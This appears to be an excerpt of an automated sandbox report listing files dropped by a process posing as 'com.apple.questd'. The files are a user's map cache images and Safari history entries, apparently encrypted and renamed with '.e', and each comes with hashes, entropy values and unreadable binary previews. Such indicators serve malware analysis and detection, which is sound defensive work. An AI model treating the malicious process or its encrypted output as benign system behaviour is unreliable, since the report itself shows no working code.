                                                                                                    Preview: o....d....K...vj>8.b$..o......O.p.];......rV...b:Umx..(W....LK....(dp...X.........uHU.]q.E'..8._9L....\k."3'_..S../..p4..,Q..u.K^y... ..h..T.3. @h8m....~y...V}...M.OdK..I..F..8.a...K....m!.z:t.....I...... .E....b'.....R.......8........e.mx..\.h...1&G.%C..._....yB...j........."..9^.{L*|._hb......}....<.}z...{..Q.h..N..X.OQEP.).!N...f..v..s.M.;.-.......O#......M2h...g....<....P...........D..i?._.{...3..;b..4^.'.2@_E.&..'E..1.$.-]...K....\<.......n.....3.....^...,..7........J....d..y......d..ZW..;..=2..e....."CO....z..1?........ft...N..0.....3.E`...hv..9./z8...<5.^.....|.x.......)v.EnH./0F.f,...#.~m.kmX..f./!2N.O.#.72tG......-..i......&1..v.....V....K.u. ..x.3+.(..Xl?.M....I....P..........M...Z.K...9.NT.Z...c....7....I....#xi.K.J."....x.~..+..|..m........e."..nc.p.v,.P.+.....,..U......$....4L.U./D.\.....S.6..K..<.ac~,...P29..%...xh.......[...FZf....4.@.."]gF...#....F....h....I{......pg;..:......M..\Dww.6.....L*..?K.@-. |_..iFo....zt.....,...J.x....a...`..@..;....R|E.p...$...<.....n/.+...z
                                                                                                    /Users/ben/Library/Caches/GeoServices/Resources/.road-noise-light-1.png.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):20843
                                                                                                    Entropy (8bit):7.985459784957444
                                                                                                    Encrypted:false
                                                                                                    MD5:169485F972FAC2A788842CDB563378E1
                                                                                                    SHA1:32F1B88B84C221F8BC06271C5FAB673C72BD0956
                                                                                                    SHA-256:B972DFEDD502B537A5F7D853CCCB31801A0938281CD4CACBDF585039ACC6DF94
                                                                                                    SHA-512:393993D535A23C7A17B73FFE22898FA6E16CDA121001152010FBB7F6F0A771982AF3A0FC63B7011C9E0DF88DE0FEC9D3B9CB4C3306990ED9162F3231D7CB894D
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: o....d....K...vj>8.b$..o......O..%z...y.....f)....@|........>..m;.......m...i.7.5gI..6k.V:........~.f..'n....].i3...~.......BkB0.LZr,U.(..kK..Ov`%1.p4...?.......c...G....S..%...._^m..........z.P...7gF..IF.Q..].<.c..]U....l...O!.E.b.g.e.Ed...O'.W..Q.yPc.......aS...n....@k...fWy.......bWCr.ufuIU.?c.a;....r...zV..&i[@....H....[..g...\.......,.J;.........#.k&..`m.....q.......r.."$.H...#.!=$Di......=.........?..26.......U"....J...z....r.,....+.........HM.ji../.IIW.8@....(.ET#...V,.....R..y....%T#../..e.......aA._...=.........mZy.n.A]Q7E9..L..c.....<g..B..=..q.x.r..9.RC......g..K3.........C.B..G-.Vk..YPOH.t..R.3... ...`.v...-[%..R+....-."....[Ez...A.....g].k.# 5j.....lc>1..t.2........X<(..k..33dv....p.$..^.;.o.%r].B;\.7.>a.*..s.7..G..E..+...g..;..&A.[.....*.Ja....k<.S..09..Ob..@=......C.<,.@m......kn......Mg....Z.qK.......S...*w....>....+.vg&..-.V.....b.o..Q.e8......_3~V....r%..u.N..@.....@EE%...X......)[......}.r!...Z_...........V.v...{.Mh^.z.&.+...g....|B!.c..Z.-.....,....!fX.3GC.ioW*.2..r
                                                                                                    /Users/ben/Library/Caches/GeoServices/Resources/.road-noise-light-1@2x.png.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):54261
                                                                                                    Entropy (8bit):7.995475650715312
                                                                                                    Encrypted:true
                                                                                                    MD5:13356065104FB05930773C911C3E8DC1
                                                                                                    SHA1:FF9D2B6FA54619D5029C275AD9F04ECC911C8659
                                                                                                    SHA-256:BFDD361BB5C5970CA77F86AAFD83B2BE6E864B0917231D9AACA9B366C01DB25D
                                                                                                    SHA-512:5C8DB56DD54922ECDAD27ECE478B8D14E14FD1DD636ECD868A3CF6DCA43735319E9E7934F8AA6C8E563D99D9F0DE3279A1A0B5A8D03C43B23BD7FCBFEDA9F649
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: o....d....K...vj..d.R.{.#....s.../....:.....f)....@|........>..m;.......m...i.7.5gI..6k.V:........~.f..'n....].i3...~.......BkB0.LZr,U.(..kK..Ov`%1.p4...?.......c...G....S..%...._^m..........z.P...7gF..IF.Q..].<.c..]U....l...O!.E.b.g.e.Ed...O'.W..Q.yPc.......aS...n....@k...fWy.......bWCr.ufuIU.?c.a;....r...zV..&i[@....H....[..g...\.......,.J;.........#.k&..`m.....q.......r.."$.H...#.!=$Di......=.........?..26.......U"....J...z....r.,....+.........HM.ji../.IIW.8@....(.ET#...V,.....R..y....%T#../..e.......aA._...=.........mZy.n.A]Q7E9..L..c.....<g..B..=..q.x.r..9.RC......g..K3.........C.B..G-.Vk..YPOH.t..R.3... ...`.v...-[%..R+....-."....[Ez...A.....g].k.# 5j.....lc>1..t.2........X<(..k..33dv....p.$..^.;.o.%r].B;\.7.>a.*..s.7..G..E..+...g..;..&A.[.....*.Ja....k<.S..09..Ob..@=......C.<,.@m......kn......Mg....Z.qK.......S...*w....>....+.vg&..-.V.....b.o..Q.e8......_3~V....r%..u.N..@.....@EE%...X......)[......}.r!...Z_...........V.v...{.Mh^.z.&.+...g....|B!.c..Z.-.....,....!fX.3GC.ioW*.2..r
                                                                                                    /Users/ben/Library/Caches/GeoServices/Resources/.sand-1.png.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):21427
                                                                                                    Entropy (8bit):7.984858535781782
                                                                                                    Encrypted:false
                                                                                                    MD5:3EC41F1B05D40ABF77B2795FFE8E5F68
                                                                                                    SHA1:BBC6EF5940F3303C4208FF04BDD1FFA3C0784BF9
                                                                                                    SHA-256:1FFAD1315A88C509B29B4271946DEC7E1FCDC6C9FC3A4AC9979721E35B6EA3CD
                                                                                                    SHA-512:CECF596F24FAC0D6A4FDCE8F2C7D68B8C35D8512370573C4B695F9DDE0C6F66ABC19BF025D631E6F08908256CCF3E311B4A4ADDBD797DCBC83C1CBA2587E7B86
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: o....d.......v......-..Y..K...vj>8.b$..o.'.......1V..'..1...oL..,.....%1........)...w..-...wo...@.]........T..~.y"..._...I$?..SF`..........t+P...c...'c.f......9&..TpQ.....r..|..&<h...k}2.US....T/..V..h...(.../....8........L..@......1q..D..f....... .U...j..K!...v...B....]..o......|.z.>...D...F.\ F...&...\. ..\..a.v....-.....32.9.V..S..& ._U.JG.Z./..B|tG...24x]..lZ...=..:k'Eo..Z.t.R....\.3.R.,.N...JcE.~...W.Y..K....+....._P.K**|.xE.e...........wH..........l..*.....T...c.\q.d+w.....l..GQU.<.........n...P0...4.....`.].7....T..bE..........U...%O..0.z......mPg7..`,*P...xK.?.e...7.<..M.A*pB..j.e.$m.+....<^..$P-.....m.......)...@d.r..C>,....y_po.J\`.......@..8...4....}...6b.K.~.4....[...o...T.>..B..^ac....5Yu+SJ6.&...\j........9.z6...........d.kP....4.7.mB...k....t.htZ.)k.{%y\...]..M...5C0.;..=W+........67....~....P...O......S.D.*^t..el./..}..i.........3...n.oKE.s....{@.0G.....H..FTkE&...G.-o.k>.......T...d..HX.5bH../.r.c...I.......c*.cW........U...7..U......KZ. &d.U..S./....!>^...W..F^....l..
                                                                                                    /Users/ben/Library/Caches/GeoServices/Resources/.sand-1@2x.png.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):97799
                                                                                                    Entropy (8bit):7.997744977613469
                                                                                                    Encrypted:true
                                                                                                    MD5:0F1C7FCE1FB97E81CAD8AEB47857CF79
                                                                                                    SHA1:CBBE217CEF587E156E9A9ABA488DC678B86DB4D9
                                                                                                    SHA-256:CFDEAF28DF17F285920D71578CFAEA85477B45DE7E09120CCD9FFDD650F1D728
                                                                                                    SHA-512:302A12AF0CCB12C228380C06CABAAE0BD32846A4F6053F6C10EB60E65B14B749AE6F11233887D5ACDFC1E7762DD3832E73920A54D71A9C475EDFCBDD64DC5ACB
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: o....d.......v......-..Y..K...vj..d.R.{..a..k..9'.../Oz.1...oL..!..x4g....s.y..w...e........7..P....'.sq.F.y....1.e...6....RG..d.4.!..)&.F...W..6.:.&Y...qU....R.._..R........3.../..Xm...p...uE..1~.9<......aNV.F'.........RO.V./3..n..[.@%_.f....)......,.H.#.uk..!...&<a....Hs..I...+......".|.H#.....um..%..q.7N.l../>...&5Bp....yT.....oqlP..~....fs...B`..5.4...:....U...=Q3......y.y0.....4.l..;.Ce...)...8Q.i.q.w..../.$..[...3..UL!8bPL....,=sHt.:P.hKL..$Rv..&.....p-X.$..i....Y..L....t}.uE......n0I.H......3*.U'r...e.7..&.b..@.....Y.../T....rN..9{..v.....A`..1*.z*........5.|Q....}...Y.N...Z.....f.>1.w%...q..Y....X.Nm.....WE...Hw.d.".L....m&.........Ne..f..x...&..4..p`...53SIW2M.+b...u.|..............2.....f.+.i8...MPxf2....Z....q....&R..*.....$.}.y.,.0.fmm.)..HS....,`....[.m..e{...:.%.....E.5.4........4..@`..k'`.aG.,..y.F..........9.$.2'..9....z.z'..>.f.......D....].HQj{]G.ZfF .;.........nnD..a.9...[U.V.A.I..|=...Yx....<..e*.c.%.Y_.E....{nh...f.r....)j.?;Bp..y..G5q.....#...j..V...@..G..........
                                                                                                    /Users/ben/Library/Caches/GeoServices/Resources/.tomtom-mask-2.png.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):1770
                                                                                                    Entropy (8bit):7.605216175759453
                                                                                                    Encrypted:false
                                                                                                    MD5:34517AE15360FA3F540CF315EDE82A63
                                                                                                    SHA1:BA48857D0DF7DEDA982F9699C56C940D6616263A
                                                                                                    SHA-256:7F5577242774F20D48A7DFDEB6D419FA1702348AD54B5A45F2AF84EC56369A0C
                                                                                                    SHA-512:4EC4107EC66B4F585DB84312766BA13F5174F1D27EEC5715031FA5C8201BD2073BE337DE4CC9B8C0E60F3C52AD1BEBD827061418EC4BE7715C7B7CB7BF2A0263
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: o....d....K...vja..m.X.....:..\.b...qx.R....oq8_.Z<M."A..q..@.A.g.'...*....Y...u......V..%..se..R...)....0F...>iv...?".@>..{7.^..........'bBwo..>.....K).V..kfK....Tv.#..'...DT.Q.@)@...2...... ~.....R...1...D...)...m.e,R8.v.....uV.R....o...]..J.C.Iv....Nt...H .yb..........9.s.n.....y.E....IN...&...\.*s$....)5}....q.mU*...#.v.MD.X9...7.Pm.....`.....td.vV.Z..,...P...1}/x'..`....\b..X.@.N..*.f.[..p.....#.,.3.S.Sw........3[....<.u.....P...9.0...a..,...:.^..j.()..p....1.......J...A...`.....H.*(d.a..>$AY5.....v.$....w....D....@.$..Z..5..6.....O...2HQ.....\.c:;Ls{.W...|U.....`H....)mJz.......+Fj.Z...y..H*........MfS.......fz.&.y...~.V..2`...5O....O.<T...zo....P......rm8.OjI.k*...@.W.{\...y.JV.....P.L..../.]...!....{..l}.={.....t:..\.......J..O..($.....x2$nL...}/h..~.<w>Z.m.....j.xT9.}....j..E...;ta...c..e.#..6..........p.+.P.............6..K.{...w.....S.xe...;O.8.?.....F...T$..:.s....j.$...I..i...... ......N....}D.X.R.@lr..>..K|...........R'..zn.7.+e.B....c...q2..i|wL:.....[~...`..X.cO.9..w.A
                                                                                                    /Users/ben/Library/Caches/GeoServices/Resources/.tomtom-mask-3@2x.png.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):3466
                                                                                                    Entropy (8bit):7.828281914616258
                                                                                                    Encrypted:false
                                                                                                    MD5:9B9A44D8B11D5DB8809F579DC3597CFA
                                                                                                    SHA1:27259306548F0F1702F55859DD4B7D3FEBC683E5
                                                                                                    SHA-256:E150F1BF72D85C6F3AF611C19194CB21A2D783D68E0E5C2A470091F9EE2F2255
                                                                                                    SHA-512:81DC62FDEB30455C3E894655370054CA211FA36B97BF4650E1E29E979235DE523222E0D66BE6D321C40B8D8C936E07A05F5C41DEE55AC44BBAB7DA35BD39F8EF
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: o....d....K...vj{.P-..>?.e..".p=B./\D.R.....oq8_\b...\.......R..8:..7.wu3[.%..ity...e.j.J..esG.h...#....i...zf.v.....m:...~E.}|..*...,gLt...9..<.dM....+<H.9...W.....+....5...j...(....4..Ba ....@.zRJ.L-...-..y..>.#.;'Z}.;.c......?.-..SX.../.....4.ne.&u......l_......I....O.U....M.p..7p.>h.$%.7../j..A.......].Y.....n...w..D..n..f3.._....u...JJnh.J.Z...........m&U......2..H.P.n ../;.;l,0.xV.I....E.....*..AP..x...l)D#....$.8.c....%.......<}...";F..%.8.z.Nd.dvR,.\........n..]....R:...N5.tm...0...1..XX..9._.(.Q...2....-w..~$%B.O...,=....$......^x.$L5....3..9.......C.F...;s....60..=...r.Wo}.......3e.E.K0............'f...O..p....O.).4......?6......jjsx.z........+w..[......yTx]...f.o.E...,.e...CT........p.L.......LH.c.H.../..T..m.b..g.Yr...5..=....W."wb.W.B#x...Ousf"a|.z.kR..5...o..d+..b.....+....$......&.{poPL...x+"n.......n.....Sk...h........:...T.3.~yE\_...K.h]..W%.u........l[..........m.1.BGXx....2...Y....._....m.4[,my,.[..I...^.`u......2afnJP...jo..zb...9Sm0...I..W........B..*4..j.U.U....o.
                                                                                                    /Users/ben/Library/Caches/GeoServices/Resources/.transparent-1.png.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):426
                                                                                                    Entropy (8bit):5.44091648945576
                                                                                                    Encrypted:false
                                                                                                    MD5:89E0D2E7B9B1F8EF3A70F313812CC569
                                                                                                    SHA1:1ACF0E2A960FD3F9BE8359383B3FD5DD602268AD
                                                                                                    SHA-256:15181BFC272B048665BB6D2CC770519C24C1F9EC7A0BCA3F4B4A6B1E52175438
                                                                                                    SHA-512:6A1914FE757C1A09F8B9542595C5ACE929F506DFA1612B3154131686B2A35C4DE2BB43D308CA34FDC3CCE96654FA69239B2F4C4542163965A79C3E1838000AE8
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: o....d....K...vj..d.R.{..$. ....gtMod..dM+....*..[.P.7'...............{otJ.Z..9q...v...3.K..1.J<P...V.j..M..*..t..a....j.y................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Caches/GeoServices/Resources/.transparent-1@2x.png.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):426
                                                                                                    Entropy (8bit):5.441445978866987
                                                                                                    Encrypted:false
                                                                                                    MD5:7C24D5D9C11CC9B3245D8D9EEDC17046
                                                                                                    SHA1:2545C217396EA9C1F3745132893286F9221EE976
                                                                                                    SHA-256:6403B4A589D33AF9B03DD2A23E65E95640CFF6FE82F2E90634272EFF18751C54
                                                                                                    SHA-512:9BBFD3BB7967EA9398951EEB3654BE6C3766DD50E7A131B743150307340DFD158F2DC48F4326AB3E0A759BEB4E1477B692350D96B59B96AEDB2D693E0214FC04
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: o....d....K...vj..d.R.{..$. ....gtMod..dM+....*..[.P.7'...............{otJ.Z..9q...v...3.K..1.J<P...V.j..M..*..t.5sn..7..y................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Caches/GeoServices/Resources/.venues-ceiling-1@2x.png.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):45004
                                                                                                    Entropy (8bit):7.994065551060612
                                                                                                    Encrypted:true
                                                                                                    MD5:2BD06432E3FE2697E031C6ECE421E379
                                                                                                    SHA1:B73AA99A6504C9F84010BC373FF8D103B54358A0
                                                                                                    SHA-256:8E33FBC9BAC6976A7DABCF6F01B720678E1D5059FF96FE462FD3E04E3CBCF426
                                                                                                    SHA-512:5B9A992F5C073DE4E97BB5B14282FCF6623560B976CAC6A8EF6DB203C56DD060932C0BFE3F74146B6543F1CD9F10968E7617D8984C95C2BEAFCD1FDD119AC6AE
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: o....d....K...vj..d.R.{..a..k..9.a..........oq8__jTcX..~.k..&..........5;...=....89..3.rO{.8s..E.D.`...m)./lGtd.A?..7..m.9gC.......m+...v*.`A......$ch|`...vI.s.#z..I0.<;.1/q.A(.B..5&.M....-P{p.....O....Vx....G_...:#........T..9.>.x...~9...T.........13.+.z9...'.......]_Cke@qd.?..........i.$.I...'E.B.B7..^/..B+.\...%...#8X~................F..".........T.P(..F(........->....Y.Gu4... Ew.3...p...)U...Oc6.....[..%..Wf....3.J.f.M.f...d.2....{...O.f(.4....k.-a....w...d:...Z.=8..fS*=."....:...\.'......_t-...56..v..........'..C..x.........1+.....D.":......sb..../....o....X:77.%..F..>....-.-..F.v....f^.K.?v{0#6.'M..^8...Qi........1Y....4$...O.M.......E3.....#...4.D.8<.....|.(.....r#..cn=\...m./.i..v.=...,l....p...\...)..9P` ....Xbl..K ..fR,..F+.....w..4..W.t.,Z..#..h_.S;.3..zt..RZ.A..z&..$...i.l..>.2......B#..h. ...G...a..3e...l...G'.e.fu...>>...W..o...S....,...&..rA.O2.JTe.e.O^.P^.C...V.go.D.."n(...NzS.....<..E..c....g.KKm.$.4%.|k=.....U...>../.Y.D%...4k.........P......P..Y.V......`.....A..~.O..
                                                                                                    /Users/ben/Library/Caches/GeoServices/Resources/.venues-ceiling-2.png.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):11770
                                                                                                    Entropy (8bit):7.965698005284113
                                                                                                    Encrypted:false
                                                                                                    MD5:8600CFE75C5AEA0CDE2CB3774ECD180F
                                                                                                    SHA1:7DE29037755ED8CA98CAA686E9534ABD8B1E4786
                                                                                                    SHA-256:33FAF2749D49EE796468F39192C9A132794E3DBA90459F6A9A113E2DBDFA2368
                                                                                                    SHA-512:771B37C22F8D7C9CCA1A74FFBB2C8C706B398B236EB68BBBA5030E4DA8A8A3D06087E08AFD793173F36599FE188FE9B9339DE7502ADE35539A24740D2E04421D
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: o....d....K...vj>8.b$..o.'.......g|.&.......oq8_.d.......K)..-....A_.?]..P...?...4......".....*.L|.J8..9.1+....."...a.b............W&...`...-...C.e....i....~$.4...s5c.3a....JP..Q.....".{....R..K`}...u:.z...A.h.........">.e;sXI..&G k..o^2O.;.@w....L.t.......;..Xssev.T2J.br|..j..j...+.|.ZW......1{x.....3.Z..J.p<."m"_...~..t...._f!.....U.|..@}.-..`F.j...N..=...W../....Y....Y[.J..O..buN{iv0E..,Ic...V'.......yLI..}o.U9.Mf. ...W.T....s.N.x...).|....]......WI......C...=..y.2w..3...i.>.Fn...z~.....iL........g<.u./..-....j.#..".k......5 ..{.kR....O....._.iz;7.L..c..G..gQ.zF.+1..p.@v.g`...........0p......q.BR>....0`...gJ.Y.|......p`...<Xg.........C..z..>e.!u<.A$... w<.8Y....?72.J..ZZ.s.I-......B.l...R..9...P.S.2....T.S...I.\...#..<...|....WFT$..E.2.^{.....U...R.4E}Z.)P^A..T.a...<.!s..;......<.u...xe..G.T/.@%`.*.-.Kb.....p...4..=............C.F .&.........H..Sw.j!z@...........!a.j6...G`G.Vrr..Q+..].......r.."...G%..F....;..%.S...v..$......@....S..B...-.W...M.8/.9.>......j.u...M.s.#p.HOSEV.....,.q
                                                                                                    /Users/ben/Library/Caches/GeoServices/Resources/.water-16.png.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):11226
                                                                                                    Entropy (8bit):7.968613985126774
                                                                                                    Encrypted:false
                                                                                                    MD5:5A165F74A47DA38A16B521D863458A77
                                                                                                    SHA1:AB4A807625A1EFD2E7D812908F078C0234EAC8C4
                                                                                                    SHA-256:655493F39B1F7B4437CD69CCC5188A0E68B11270F25A012AA3C81223D91F0E8A
                                                                                                    SHA-512:98227411A54ACB0E9C6F36AD49E85F6A2CA048AE7380B0321F627E883990B9152BDA85B610AF3E6256B0F28578B5009F5BF5FA57ED330537EFB0041E2D6A3507
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: o....d.......v......-..Y..K...vj>8.b$..o.'.......1V..'..1...oL..,.....%1........o.H....[5.p?....X...6...o/....0._.@..{.JA%../2_..8.....N...........8..#..fT6y.c....(.F....d...._...i.V./Ki..t<.........Mr....0..jGd..D.... JW..r.8$.......H.......#.W..\......F`..WK.Pf.`?u?(0..Es..XaJ...\..`..ZD...m..{.I......S..;.O<.CJi.S...dSr.E....r...e.;.~|..d..n...$0.42........mr.!..}...pc..u.8.....~$v....4.C^c.....P......{.w.&./....sB.1........v..q(j~JI.....g......]...I...........f.-.............u..4Q..".f=.v"2C....>.5J.`T..h........|...lv.m^.........Qq%...:...4O.wN.a....tj...K.eP.S.P^...2..IG.d`k..N.<...;...UW......a..`R.4$T2.L.IE)...)..I...@h.J.....z/.;a.D.WX.......Ko0d.....e.....s .^....3./..].e :E..J....2.~..$.}0\(...so.M$.}.S#E...xq.U\TM%. v.I50.l9..i,..........j.....n....!...B.Q"....x.b.ZN.#M..Kd>5...'....].F.I.4=..l.^u......[;u....`..L.'..y....r..e.yD8.Q.....U.{z$..=R....%....Rh...pa...0...\M-......O..8....uM..D....*.9...%....s.i...Q.....\^4.....m.....)..CQ...G].D..c.....}?...Ng..R..K^.)*..2....
                                                                                                    /Users/ben/Library/Caches/GeoServices/Resources/.water-16@2x.png.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):21459
                                                                                                    Entropy (8bit):7.985289170670485
                                                                                                    Encrypted:false
                                                                                                    MD5:500E5DE2E172ED637FBDD06E27C45521
                                                                                                    SHA1:039D22A9A7263B745F1AA34942299C7320322B63
                                                                                                    SHA-256:A45C1865B8068AF108C044761C47BBA128E45E025674E21CEF705770A8B88D97
                                                                                                    SHA-512:35FD3824D9E59C713AF5FE488FDBCF1A8727E51C239807C35027F6CD30A154D818C4751E5FD77BE2890A72882DA639C517AD9F6A1681C0F96F63D7F101898BC8
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: o....d.......v......-..Y..K...vj..d.R.{..a..k..9'.../Oz.1...oL..!..x4g....s.y..w.^.......8.".e....$....T.>Y.a....G.!.9.5zia..(.il;~@.6..|...Z^..7u)J.V)\YX.NK...7.... V.y.2....T-.....GIQ.a.._<...]e.../.9.......%3.......m...F.~..g.m..|h................=v.'...R......q...........t<.JS..u.xV......0_>n7i..at5.....T......l.E.K.~UV7*..,j.j..'.9...*$.o....Y...A._$.A...LUpI..|D.:....Ve*...<.<V...R..B..3B.B9L.....u5..Ji..].S.5=......@.<.hJuNt..D....\..T5..-..Rr&hY.{.*.(EH..R.......D..+o&..m.g..>..MO..x..-A.j.E...{...p..w..>....1i......Sk@.^..~(.....69.[f.>.X..3?B)...Z~a.z.&....8Dm.l*........k.....SMVg.....|A....Dq>F3.....f.jR.n.....F....../..Q........,........'H.{^a.C.....Nl.....].|(u....os|.0<Nfp".\.B9rH....w...Y8e.I..........'Y...Q..#.{5......ey...E.......F..7Gj..DV........J.....`.@...'.v..o..q..D..bQ.....q8m^.n..Q........8.F..Z.Q...a.^^r.6.k.....)..\.$^.z..Z........$.]..V.~L..t..T`5....r......kg....).. L.ns.|/Zc-......lbo.3[.c..(..`......u....?........@....v..c....y1|.)...e8.9.g...k..%....S..A
                                                                                                    /Users/ben/Library/Caches/GeoServices/Resources/.white-1.png.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):394
                                                                                                    Entropy (8bit):5.235214324349632
                                                                                                    Encrypted:false
                                                                                                    MD5:BAE14D69F1F538EE38901AF301698790
                                                                                                    SHA1:44F11BC97CE13DCE836A24752E596599D327C022
                                                                                                    SHA-256:143C175099D6EFFCAA4A538D4F3009C4A997A9E7268798C49F7063E931E2C496
                                                                                                    SHA-512:F0AD3E21DD9A2FE0E2A3ABEB1CAD0DC8F1C23970DBD030D9FF9324FBBA11635D1E33E13BFFA7D3399C9B2166DC58706A6C427B8DDEA0C6C322CD7EF582F8C4CC
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: o....d.......v......-..Y..K...vjy..?=._`l........%....5...-...U.y.49.......5...W.qm.7(...Y................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Caches/GeoServices/Resources/.white-1@2x.png.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):394
                                                                                                    Entropy (8bit):5.219985897953693
                                                                                                    Encrypted:false
                                                                                                    MD5:E3D6482EE9FB523D6242CF12465D16FB
                                                                                                    SHA1:F2C88382E7C72E1DE9AB5B7CCFA834C5AE26F98B
                                                                                                    SHA-256:4D5A7EFDF340F03558514091BDBE6138C53E3E5958F2A4D9E2B0286839D10A97
                                                                                                    SHA-512:51367447DB47A296FE2D6C6EB0CE76D095CF4F6BAD677AAF3ACD6A0F597C949619649B7B6A70DE37C83FB465C03EEFC618BACF02A8B2403C617476DF7AEC824B
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: o....d.......v......-..Y..K...vjy..?=._`l........%....5...-...U.y.49.......5...W.j...Zt..Y................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Caches/Metadata/Safari/History/.http:%2F%2Fwww.faronics.com%2Fde%2Fdownloads_de%2Fdownload-files_de%2F?product=DFM&software=.webhistory.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):2962
                                                                                                    Entropy (8bit):7.78533158484436
                                                                                                    Encrypted:false
                                                                                                    MD5:B8B2982BADEDBDB10B34CAD71E6C0B29
                                                                                                    SHA1:8649460E6DEEDE92183E66D5E8817168AF288048
                                                                                                    SHA-256:AB9E96EFD4132EA031577FA61D3D825C98B7344CF33064276209E228BB5A497E
                                                                                                    SHA-512:E8EDE572FA2F39C0F498DC56D2133596B8658334B68297B4411D06087ED6D2F97775E099CF80D0E0B52BF7D83C803D1EB327957A16DEF314F6104A274D502CEA
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..@.7R......FQ.b.8...R.Z. .V...7..]F.'....qD.....K.t.`;-...1.......I0Q{...[.iv.c.U..4W.J/.R.ma/.....V`.%5....$.>q......j...~.Gn..........A..M..{......{..V.......x#,".*..X.k....K+n..F..i.8..........bz6..2..GS.KQ.G.q..(....upbj*...8..//.......Sq}%..M.......0..1.^..2.u...x"H.~.b.....&F^&..z"^..[...lS.V.b......mNc.......|4.;.C..AvCMS.p#...;.~..[..../.-[....5.'....D.XfH2..2.....c.A......+.....F^.2d.G.......0.mpu.b..9.Zz...........d;.e.....p..b...<.G..Pr..qu.A.d....O.E..@..2...3w.......2...Q..)...#....B...[............#....R...<...d...{.Q..).........-..'p....De.._...6.....%.Hx..I?gT...r/...d.`..X....:V5.......g...y..../O..P..^R...W..M..v..<q.!s#...?....Dv9]5.B.....x......\O#.....\......\........:...r~....|O....G.....^t..F.....6."vj0....mNc.$.O..M.Q.N...D..*..+...m.$.$.RZ.2...3w.......2..%..9..J.......x.. ...BJ.....,$.`..w_..5H...1a.]8...../`I.u..h.z...K.. ..2...3w.......2..X..8.D..;..2...gq~......2...3w.......2..../..<...#q:... ..w....]8.Lmq4....a...T..j.mI....LK./^.d.*.{0...q..........}\...
                                                                                                    /Users/ben/Library/Caches/Metadata/Safari/History/.http:%2F%2Fwww.faronics.com%2Fde%2Fdownloads_de%2Fdownload-files_de%2F?product=DFM.webhistory.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):442
                                                                                                    Entropy (8bit):5.563823003836791
                                                                                                    Encrypted:false
                                                                                                    MD5:C0047B43027633AEAC8E9911A544196E
                                                                                                    SHA1:9D8665EDC864F671D65E23B1EB999711CEAFDEE8
                                                                                                    SHA-256:FD4F7F9237A1416B6F39E085AAA34801FD8811C1A8C3D0A52753E9F1234072CB
                                                                                                    SHA-512:40137BFA4EA536873B0C3344DA4FF93935C1118586B1EAE2239B163C8736D339444F9CCE94C0006C688322D71D818E7F9897811717B593B0807C146CA8F9FBE8
                                                                                                    Malicious:false
                                                                                                    Reputation:low
